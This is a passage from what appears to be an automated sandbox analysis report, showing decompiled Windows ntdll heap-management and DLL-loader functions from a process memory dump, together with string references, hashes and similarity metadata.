                                                                                                            				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
                                                                                                            				if(_t251 == 0) {
                                                                                                            					__eflags =  *0x1158748 - 1;
                                                                                                            					if( *0x1158748 >= 1) {
                                                                                                            						__eflags =  *(__edx + 2) & 0x00000008;
                                                                                                            						if(( *(__edx + 2) & 0x00000008) == 0) {
                                                                                                            							_t110 = _t256 + 0xfff; // 0xfe7
                                                                                                            							__eflags = (_t110 & 0xfffff000) - __edx;
                                                                                                            							if((_t110 & 0xfffff000) != __edx) {
                                                                                                            								_t197 =  *[fs:0x30];
                                                                                                            								__eflags =  *(_t197 + 0xc);
                                                                                                            								if( *(_t197 + 0xc) == 0) {
                                                                                                            									_push("HEAP: ");
                                                                                                            									E0106B150();
                                                                                                            									_t260 = _t257 + 4;
                                                                                                            								} else {
                                                                                                            									E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                            									_t260 = _t257 + 8;
                                                                                                            								}
                                                                                                            								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
                                                                                                            								E0106B150();
                                                                                                            								_t257 = _t260 + 4;
                                                                                                            								__eflags =  *0x1157bc8;
                                                                                                            								if(__eflags == 0) {
                                                                                                            									E01122073(_t206, 1, _t251, __eflags);
                                                                                                            								}
                                                                                                            								_t235 = _v24;
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            				_t134 =  *((intOrPtr*)(_t256 + 6));
                                                                                                            				if(_t134 == 0) {
                                                                                                            					_t210 = _t206;
                                                                                                            					_v48 = _t206;
                                                                                                            				} else {
                                                                                                            					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
                                                                                                            					_v48 = _t210;
                                                                                                            				}
                                                                                                            				_v5 =  *(_t256 + 2);
                                                                                                            				do {
                                                                                                            					if(_t235 > 0xfe00) {
                                                                                                            						_v12 = 0xfe00;
                                                                                                            						__eflags = _t235 - 0xfe01;
                                                                                                            						if(_t235 == 0xfe01) {
                                                                                                            							_v12 = 0xfdf0;
                                                                                                            						}
                                                                                                            						_t138 = 0;
                                                                                                            					} else {
                                                                                                            						_v12 = _t235 & 0x0000ffff;
                                                                                                            						_t138 = _v5;
                                                                                                            					}
                                                                                                            					 *(_t256 + 2) = _t138;
                                                                                                            					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
                                                                                                            					_t236 =  *((intOrPtr*)(_t210 + 0x18));
                                                                                                            					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
                                                                                                            						_t141 = 0;
                                                                                                            					} else {
                                                                                                            						_t141 = (_t256 - _t210 >> 0x10) + 1;
                                                                                                            						_v40 = _t141;
                                                                                                            						if(_t141 >= 0xfe) {
                                                                                                            							_push(_t210);
                                                                                                            							E0112A80D(_t236, _t256, _t210, 0);
                                                                                                            							_t141 = _v40;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
                                                                                                            					 *((char*)(_t256 + 6)) = _t141;
                                                                                                            					_t142 = _v12;
                                                                                                            					 *_t256 = _t142;
                                                                                                            					 *(_t256 + 3) = 0;
                                                                                                            					_t211 = _t142 & 0x0000ffff;
                                                                                                            					 *((char*)(_t256 + 7)) = 0;
                                                                                                            					_v20 = _t211;
                                                                                                            					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
                                                                                                            						_t119 = _t256 + 0x10; // -8
                                                                                                            						E010BD5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
                                                                                                            						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
                                                                                                            						_t211 = _v20;
                                                                                                            					}
                                                                                                            					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
                                                                                                            					if(_t252 == 0) {
                                                                                                            						L56:
                                                                                                            						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
                                                                                                            						_t146 = _t206 + 0xc0;
                                                                                                            						goto L19;
                                                                                                            					} else {
                                                                                                            						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
                                                                                                            							L15:
                                                                                                            							_t185 = _t211;
                                                                                                            							goto L17;
                                                                                                            						} else {
                                                                                                            							while(1) {
                                                                                                            								_t187 =  *_t252;
                                                                                                            								if(_t187 == 0) {
                                                                                                            									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
                                                                                                            									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
                                                                                                            									goto L17;
                                                                                                            								}
                                                                                                            								_t252 = _t187;
                                                                                                            								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
                                                                                                            									continue;
                                                                                                            								}
                                                                                                            								goto L15;
                                                                                                            							}
                                                                                                            							while(1) {
                                                                                                            								L17:
                                                                                                            								_t212 = E0108AB40(_t206, _t252, 1, _t185, _t211);
                                                                                                            								if(_t212 != 0) {
                                                                                                            									_t146 = _t206 + 0xc0;
                                                                                                            									break;
                                                                                                            								}
                                                                                                            								_t252 =  *_t252;
                                                                                                            								_t211 = _v20;
                                                                                                            								_t185 =  *(_t252 + 0x14);
                                                                                                            							}
                                                                                                            							L19:
                                                                                                            							if(_t146 != _t212) {
                                                                                                            								_t237 =  *(_t206 + 0x4c);
                                                                                                            								_t253 = _v20;
                                                                                                            								while(1) {
                                                                                                            									__eflags = _t237;
                                                                                                            									if(_t237 == 0) {
                                                                                                            										_t147 =  *(_t212 - 8) & 0x0000ffff;
                                                                                                            									} else {
                                                                                                            										_t184 =  *(_t212 - 8);
                                                                                                            										_t237 =  *(_t206 + 0x4c);
                                                                                                            										__eflags = _t184 & _t237;
                                                                                                            										if((_t184 & _t237) != 0) {
                                                                                                            											_t184 = _t184 ^  *(_t206 + 0x50);
                                                                                                            											__eflags = _t184;
                                                                                                            										}
                                                                                                            										_t147 = _t184 & 0x0000ffff;
                                                                                                            									}
                                                                                                            									__eflags = _t253 - (_t147 & 0x0000ffff);
                                                                                                            									if(_t253 <= (_t147 & 0x0000ffff)) {
                                                                                                            										goto L20;
                                                                                                            									}
                                                                                                            									_t212 =  *_t212;
                                                                                                            									__eflags = _t206 + 0xc0 - _t212;
                                                                                                            									if(_t206 + 0xc0 != _t212) {
                                                                                                            										continue;
                                                                                                            									} else {
                                                                                                            										goto L20;
                                                                                                            									}
                                                                                                            									goto L56;
                                                                                                            								}
                                                                                                            							}
                                                                                                            							L20:
                                                                                                            							_t149 =  *((intOrPtr*)(_t212 + 4));
                                                                                                            							_t33 = _t256 + 8; // -16
                                                                                                            							_t238 = _t33;
                                                                                                            							_t254 =  *_t149;
                                                                                                            							if( *_t149 != _t212) {
                                                                                                            								_push(_t212);
                                                                                                            								E0112A80D(0, _t212, 0, _t254);
                                                                                                            							} else {
                                                                                                            								 *_t238 = _t212;
                                                                                                            								 *((intOrPtr*)(_t238 + 4)) = _t149;
                                                                                                            								 *_t149 = _t238;
                                                                                                            								 *((intOrPtr*)(_t212 + 4)) = _t238;
                                                                                                            							}
                                                                                                            							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
                                                                                                            							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
                                                                                                            							if(_t255 == 0) {
                                                                                                            								L36:
                                                                                                            								if( *(_t206 + 0x4c) != 0) {
                                                                                                            									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
                                                                                                            									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
                                                                                                            								}
                                                                                                            								_t210 = _v48;
                                                                                                            								_t251 = _v12 & 0x0000ffff;
                                                                                                            								_t131 = _v20;
                                                                                                            								_t235 = _v24 - _t131;
                                                                                                            								_v24 = _t235;
                                                                                                            								_t256 = _t256 + _t131 * 8;
                                                                                                            								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
                                                                                                            									goto L41;
                                                                                                            								} else {
                                                                                                            									goto L39;
                                                                                                            								}
                                                                                                            							} else {
                                                                                                            								_t216 =  *_t256 & 0x0000ffff;
                                                                                                            								_v28 = _t216;
                                                                                                            								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
                                                                                                            									L28:
                                                                                                            									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
                                                                                                            									_v32 = _t242;
                                                                                                            									if( *((intOrPtr*)(_t255 + 8)) != 0) {
                                                                                                            										_t167 = _t242 + _t242;
                                                                                                            									} else {
                                                                                                            										_t167 = _t242;
                                                                                                            									}
                                                                                                            									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
                                                                                                            									_t168 = _t167 << 2;
                                                                                                            									_v40 = _t168;
                                                                                                            									_t206 = _v44;
                                                                                                            									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
                                                                                                            									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
                                                                                                            										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
                                                                                                            									}
                                                                                                            									_t217 = _v16;
                                                                                                            									if(_t217 != 0) {
                                                                                                            										_t173 = _t217 - 8;
                                                                                                            										_v52 = _t173;
                                                                                                            										_t174 =  *_t173;
                                                                                                            										__eflags =  *(_t206 + 0x4c);
                                                                                                            										if( *(_t206 + 0x4c) != 0) {
                                                                                                            											_t245 =  *(_t206 + 0x50) ^ _t174;
                                                                                                            											_v36 = _t245;
                                                                                                            											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
                                                                                                            											__eflags = _t245 >> 0x18 - _t225;
                                                                                                            											if(_t245 >> 0x18 != _t225) {
                                                                                                            												_push(_t225);
                                                                                                            												E0112A80D(_t206, _v52, 0, 0);
                                                                                                            											}
                                                                                                            											_t174 = _v36;
                                                                                                            											_t217 = _v16;
                                                                                                            											_t242 = _v32;
                                                                                                            										}
                                                                                                            										_v28 = _v28 - (_t174 & 0x0000ffff);
                                                                                                            										__eflags = _v28;
                                                                                                            										if(_v28 > 0) {
                                                                                                            											goto L34;
                                                                                                            										} else {
                                                                                                            											goto L33;
                                                                                                            										}
                                                                                                            									} else {
                                                                                                            										L33:
                                                                                                            										_t58 = _t256 + 8; // -16
                                                                                                            										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
                                                                                                            										_t206 = _v44;
                                                                                                            										_t217 = _v16;
                                                                                                            										L34:
                                                                                                            										if(_t217 == 0) {
                                                                                                            											asm("bts eax, edx");
                                                                                                            										}
                                                                                                            										goto L36;
                                                                                                            									}
                                                                                                            								} else {
                                                                                                            									goto L24;
                                                                                                            								}
                                                                                                            								while(1) {
                                                                                                            									L24:
                                                                                                            									_t182 =  *_t255;
                                                                                                            									if(_t182 == 0) {
                                                                                                            										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
                                                                                                            										__eflags = _t216;
                                                                                                            										goto L28;
                                                                                                            									}
                                                                                                            									_t255 = _t182;
                                                                                                            									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
                                                                                                            										continue;
                                                                                                            									} else {
                                                                                                            										goto L28;
                                                                                                            									}
                                                                                                            								}
                                                                                                            								goto L28;
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            					L39:
                                                                                                            				} while (_t235 != 0);
                                                                                                            				_t214 = _v12;
                                                                                                            				_t131 =  *(_t206 + 0x54) ^ _t214;
                                                                                                            				 *(_t256 + 4) = _t131;
                                                                                                            				if(_t214 == 0) {
                                                                                                            					__eflags =  *0x1158748 - 1;
                                                                                                            					if( *0x1158748 >= 1) {
                                                                                                            						_t127 = _t256 + 0xfff; // 0xfff
                                                                                                            						_t131 = _t127 & 0xfffff000;
                                                                                                            						__eflags = _t131 - _t256;
                                                                                                            						if(_t131 != _t256) {
                                                                                                            							_t156 =  *[fs:0x30];
                                                                                                            							__eflags =  *(_t156 + 0xc);
                                                                                                            							if( *(_t156 + 0xc) == 0) {
                                                                                                            								_push("HEAP: ");
                                                                                                            								E0106B150();
                                                                                                            							} else {
                                                                                                            								E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                            							}
                                                                                                            							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
                                                                                                            							_t131 = E0106B150();
                                                                                                            							__eflags =  *0x1157bc8;
                                                                                                            							if(__eflags == 0) {
                                                                                                            								_t131 = E01122073(_t206, 1, _t251, __eflags);
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            				goto L41;
                                                                                                            			}























































                                                                                                            0x0108aa34
                                                                                                            0x0108aa40
                                                                                                            0x0108aa43
                                                                                                            0x0108aa46
                                                                                                            0x0108aa4d
                                                                                                            0x010d23ab
                                                                                                            0x010d23b2
                                                                                                            0x010d23b8
                                                                                                            0x010d23be
                                                                                                            0x010d23c3
                                                                                                            0x010d23c5
                                                                                                            0x010d23cb
                                                                                                            0x010d23d1
                                                                                                            0x010d23d5
                                                                                                            0x010d23f6
                                                                                                            0x010d23fb
                                                                                                            0x010d23d7
                                                                                                            0x010d23ec
                                                                                                            0x010d23f1
                                                                                                            0x010d2403
                                                                                                            0x010d2408
                                                                                                            0x010d2410
                                                                                                            0x010d2417
                                                                                                            0x010d2422
                                                                                                            0x010d2422
                                                                                                            0x010d2417
                                                                                                            0x010d23c5
                                                                                                            0x010d23b2
                                                                                                            0x00000000

                                                                                                            Strings
                                                                                                            • HEAP: , xrefs: 010D22E6, 010D23F6
                                                                                                            • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 010D22F3
                                                                                                            • HEAP[%wZ]: , xrefs: 010D22D7, 010D23E7
                                                                                                            • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 010D2403
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                                            • API String ID: 0-1657114761
                                                                                                            • Opcode ID: 22b22bff0883075436cc38bc4a110a3199e2d152e3e0bb308a2e8632c9e2d905
                                                                                                            • Instruction ID: a01f4ed27ab1dc64695c61be3c2a331836d94727a73115ef016c938d618f7247
                                                                                                            • Opcode Fuzzy Hash: 22b22bff0883075436cc38bc4a110a3199e2d152e3e0bb308a2e8632c9e2d905
                                                                                                            • Instruction Fuzzy Hash: 2AD1C074B08606DFDB19DF68C4907BABBF1BF48300F1485AAD9D69BB42E734A941CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 69%
                                                                                                            			E0108A229(void* __ecx, void* __edx) {
                                                                                                            				signed int _v20;
                                                                                                            				char _v24;
                                                                                                            				char _v28;
                                                                                                            				void* _v44;
                                                                                                            				void* _v48;
                                                                                                            				void* _v56;
                                                                                                            				void* _v60;
                                                                                                            				void* __ebx;
                                                                                                            				signed int _t55;
                                                                                                            				signed int _t57;
                                                                                                            				void* _t61;
                                                                                                            				intOrPtr _t62;
                                                                                                            				void* _t65;
                                                                                                            				void* _t71;
                                                                                                            				signed char* _t74;
                                                                                                            				intOrPtr _t75;
                                                                                                            				signed char* _t80;
                                                                                                            				intOrPtr _t81;
                                                                                                            				void* _t82;
                                                                                                            				signed char* _t85;
                                                                                                            				signed char _t91;
                                                                                                            				void* _t103;
                                                                                                            				void* _t105;
                                                                                                            				void* _t121;
                                                                                                            				void* _t129;
                                                                                                            				signed int _t131;
                                                                                                            				void* _t133;
                                                                                                            
                                                                                                            				_t105 = __ecx;
                                                                                                            				_t133 = (_t131 & 0xfffffff8) - 0x1c;
                                                                                                            				_t103 = __edx;
                                                                                                            				_t129 = __ecx;
                                                                                                            				E0108DF24(__edx,  &_v28, _t133);
                                                                                                            				_t55 =  *(_t129 + 0x40) & 0x00040000;
                                                                                                            				asm("sbb edi, edi");
                                                                                                            				_t121 = ( ~_t55 & 0x0000003c) + 4;
                                                                                                            				if(_t55 != 0) {
                                                                                                            					_push(0);
                                                                                                            					_push(0x14);
                                                                                                            					_push( &_v24);
                                                                                                            					_push(3);
                                                                                                            					_push(_t129);
                                                                                                            					_push(0xffffffff);
                                                                                                            					_t57 = E010A9730();
                                                                                                            					__eflags = _t57;
                                                                                                            					if(_t57 < 0) {
                                                                                                            						L17:
                                                                                                            						_push(_t105);
                                                                                                            						E0112A80D(_t129, 1, _v20, 0);
                                                                                                            						_t121 = 4;
                                                                                                            						goto L1;
                                                                                                            					}
                                                                                                            					__eflags = _v20 & 0x00000060;
                                                                                                            					if((_v20 & 0x00000060) == 0) {
                                                                                                            						goto L17;
                                                                                                            					}
                                                                                                            					__eflags = _v24 - _t129;
                                                                                                            					if(_v24 == _t129) {
                                                                                                            						goto L1;
                                                                                                            					}
                                                                                                            					goto L17;
                                                                                                            				}
                                                                                                            				L1:
                                                                                                            				_push(_t121);
                                                                                                            				_push(0x1000);
                                                                                                            				_push(_t133 + 0x14);
                                                                                                            				_push(0);
                                                                                                            				_push(_t133 + 0x20);
                                                                                                            				_push(0xffffffff);
                                                                                                            				_t61 = E010A9660();
                                                                                                            				_t122 = _t61;
                                                                                                            				if(_t61 < 0) {
                                                                                                            					_t62 =  *[fs:0x30];
                                                                                                            					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
                                                                                                            					__eflags =  *(_t62 + 0xc);
                                                                                                            					if( *(_t62 + 0xc) == 0) {
                                                                                                            						_push("HEAP: ");
                                                                                                            						E0106B150();
                                                                                                            					} else {
                                                                                                            						E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                            					}
                                                                                                            					_push( *((intOrPtr*)(_t133 + 0xc)));
                                                                                                            					_push( *((intOrPtr*)(_t133 + 0x14)));
                                                                                                            					_push(_t129);
                                                                                                            					E0106B150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
                                                                                                            					_t65 = 0;
                                                                                                            					L13:
                                                                                                            					return _t65;
                                                                                                            				}
                                                                                                            				_t71 = E01087D50();
                                                                                                            				_t124 = 0x7ffe0380;
                                                                                                            				if(_t71 != 0) {
                                                                                                            					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                            				} else {
                                                                                                            					_t74 = 0x7ffe0380;
                                                                                                            				}
                                                                                                            				if( *_t74 != 0) {
                                                                                                            					_t75 =  *[fs:0x30];
                                                                                                            					__eflags =  *(_t75 + 0x240) & 0x00000001;
                                                                                                            					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
                                                                                                            						E0112138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
                                                                                                            					}
                                                                                                            				}
                                                                                                            				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
                                                                                                            				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
                                                                                                            				if(E01087D50() != 0) {
                                                                                                            					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                            				} else {
                                                                                                            					_t80 = _t124;
                                                                                                            				}
                                                                                                            				if( *_t80 != 0) {
                                                                                                            					_t81 =  *[fs:0x30];
                                                                                                            					__eflags =  *(_t81 + 0x240) & 0x00000001;
                                                                                                            					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
                                                                                                            						__eflags = E01087D50();
                                                                                                            						if(__eflags != 0) {
                                                                                                            							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                            							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                            						}
                                                                                                            						E01121582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
                                                                                                            					}
                                                                                                            				}
                                                                                                            				_t82 = E01087D50();
                                                                                                            				_t125 = 0x7ffe038a;
                                                                                                            				if(_t82 != 0) {
                                                                                                            					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                                                                            				} else {
                                                                                                            					_t85 = 0x7ffe038a;
                                                                                                            				}
                                                                                                            				if( *_t85 != 0) {
                                                                                                            					__eflags = E01087D50();
                                                                                                            					if(__eflags != 0) {
                                                                                                            						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                                                                            						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                                                                            					}
                                                                                                            					E01121582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
                                                                                                            				}
                                                                                                            				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
                                                                                                            				_t91 =  *(_t103 + 2);
                                                                                                            				if((_t91 & 0x00000004) != 0) {
                                                                                                            					E010BD5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
                                                                                                            					_t91 =  *(_t103 + 2);
                                                                                                            				}
                                                                                                            				 *(_t103 + 2) = _t91 & 0x00000017;
                                                                                                            				_t65 = 1;
                                                                                                            				goto L13;
                                                                                                            			}

                                                                                                            0x0108a282
                                                                                                            0x010d1db5
                                                                                                            0x010d1dbb
                                                                                                            0x010d1dc1
                                                                                                            0x010d1dc5
                                                                                                            0x010d1de4
                                                                                                            0x010d1de9
                                                                                                            0x010d1dc7
                                                                                                            0x010d1ddc
                                                                                                            0x010d1de1
                                                                                                            0x010d1def
                                                                                                            0x010d1df3
                                                                                                            0x010d1df7
                                                                                                            0x010d1dfe
                                                                                                            0x010d1e06
                                                                                                            0x0108a302
                                                                                                            0x0108a308
                                                                                                            0x0108a308
                                                                                                            0x0108a288
                                                                                                            0x0108a28d
                                                                                                            0x0108a294
                                                                                                            0x010d1cc1
                                                                                                            0x0108a29a
                                                                                                            0x0108a29a
                                                                                                            0x0108a29a
                                                                                                            0x0108a29f
                                                                                                            0x010d1ccb
                                                                                                            0x010d1cd1
                                                                                                            0x010d1cd8
                                                                                                            0x010d1cea
                                                                                                            0x010d1cea
                                                                                                            0x010d1cd8
                                                                                                            0x0108a2a9
                                                                                                            0x0108a2af
                                                                                                            0x0108a2bc
                                                                                                            0x010d1cfd
                                                                                                            0x0108a2c2
                                                                                                            0x0108a2c2
                                                                                                            0x0108a2c2
                                                                                                            0x0108a2c7
                                                                                                            0x010d1d07
                                                                                                            0x010d1d0d
                                                                                                            0x010d1d14
                                                                                                            0x010d1d1f
                                                                                                            0x010d1d21
                                                                                                            0x010d1d2c
                                                                                                            0x010d1d2c
                                                                                                            0x010d1d2c
                                                                                                            0x010d1d47
                                                                                                            0x010d1d47
                                                                                                            0x010d1d14
                                                                                                            0x0108a2cd
                                                                                                            0x0108a2d2
                                                                                                            0x0108a2d9
                                                                                                            0x010d1d5a
                                                                                                            0x0108a2df
                                                                                                            0x0108a2df
                                                                                                            0x0108a2df
                                                                                                            0x0108a2e4
                                                                                                            0x010d1d69
                                                                                                            0x010d1d6b
                                                                                                            0x010d1d76
                                                                                                            0x010d1d76
                                                                                                            0x010d1d76
                                                                                                            0x010d1d91
                                                                                                            0x010d1d91
                                                                                                            0x0108a2ea
                                                                                                            0x0108a2f0
                                                                                                            0x0108a2f5
                                                                                                            0x010d1da8
                                                                                                            0x010d1dad
                                                                                                            0x010d1dad
                                                                                                            0x0108a2fd
                                                                                                            0x0108a300
                                                                                                            0x00000000

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                                            • API String ID: 2994545307-2586055223
                                                                                                            • Opcode ID: 1b515e1d28d682543c7e2285c6c7ec745057acbe0a03520d6d6ad858bfd80707
                                                                                                            • Instruction ID: 743edc50f85d29978699d3a421302344a90324dca92b3e8e1ea3b9419ae72b45
                                                                                                            • Opcode Fuzzy Hash: 1b515e1d28d682543c7e2285c6c7ec745057acbe0a03520d6d6ad858bfd80707
                                                                                                            • Instruction Fuzzy Hash: BE51D2722087819FD322EB68C844F6B7BE9EB80754F1904A9F9D58B292DB35D900CB61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 44%
                                                                                                            			E01098E00(void* __ecx) {
                                                                                                            				signed int _v8;
                                                                                                            				char _v12;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				intOrPtr* _t32;
                                                                                                            				intOrPtr _t35;
                                                                                                            				intOrPtr _t43;
                                                                                                            				void* _t46;
                                                                                                            				intOrPtr _t47;
                                                                                                            				void* _t48;
                                                                                                            				signed int _t49;
                                                                                                            				void* _t50;
                                                                                                            				intOrPtr* _t51;
                                                                                                            				signed int _t52;
                                                                                                            				void* _t53;
                                                                                                            				intOrPtr _t55;
                                                                                                            
                                                                                                            				_v8 =  *0x115d360 ^ _t52;
                                                                                                            				_t49 = 0;
                                                                                                            				_t48 = __ecx;
                                                                                                            				_t55 =  *0x1158464; // 0x76c90110
                                                                                                            				if(_t55 == 0) {
                                                                                                            					L9:
                                                                                                            					if( !_t49 >= 0) {
                                                                                                            						if(( *0x1155780 & 0x00000003) != 0) {
                                                                                                            							E010E5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                                                                                                            						}
                                                                                                            						if(( *0x1155780 & 0x00000010) != 0) {
                                                                                                            							asm("int3");
                                                                                                            						}
                                                                                                            					}
                                                                                                            					return E010AB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                                                                                                            				}
                                                                                                            				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                                                                                                            				_t43 =  *0x1157984; // 0xc02b08
                                                                                                            				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                                                                                                            					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                                                                                                            					if(_t48 == _t43) {
                                                                                                            						_t50 = 0x5c;
                                                                                                            						if( *_t32 == _t50) {
                                                                                                            							_t46 = 0x3f;
                                                                                                            							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                                                                                                            								_t32 = _t32 + 8;
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            					_t51 =  *0x1158464; // 0x76c90110
                                                                                                            					 *0x115b1e0(_t47, _t32,  &_v12);
                                                                                                            					_t49 =  *_t51();
                                                                                                            					if(_t49 >= 0) {
                                                                                                            						L8:
                                                                                                            						_t35 = _v12;
                                                                                                            						if(_t35 != 0) {
                                                                                                            							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                                                                                                            								E01099B10( *((intOrPtr*)(_t48 + 0x48)));
                                                                                                            								_t35 = _v12;
                                                                                                            							}
                                                                                                            							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                                                                                                            						}
                                                                                                            						goto L9;
                                                                                                            					}
                                                                                                            					if(_t49 != 0xc000008a) {
                                                                                                            						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                                                                                                            							if(_t49 != 0xc00000bb) {
                                                                                                            								goto L8;
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            					if(( *0x1155780 & 0x00000005) != 0) {
                                                                                                            						_push(_t49);
                                                                                                            						E010E5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                                                                                                            						_t53 = _t53 + 0x1c;
                                                                                                            					}
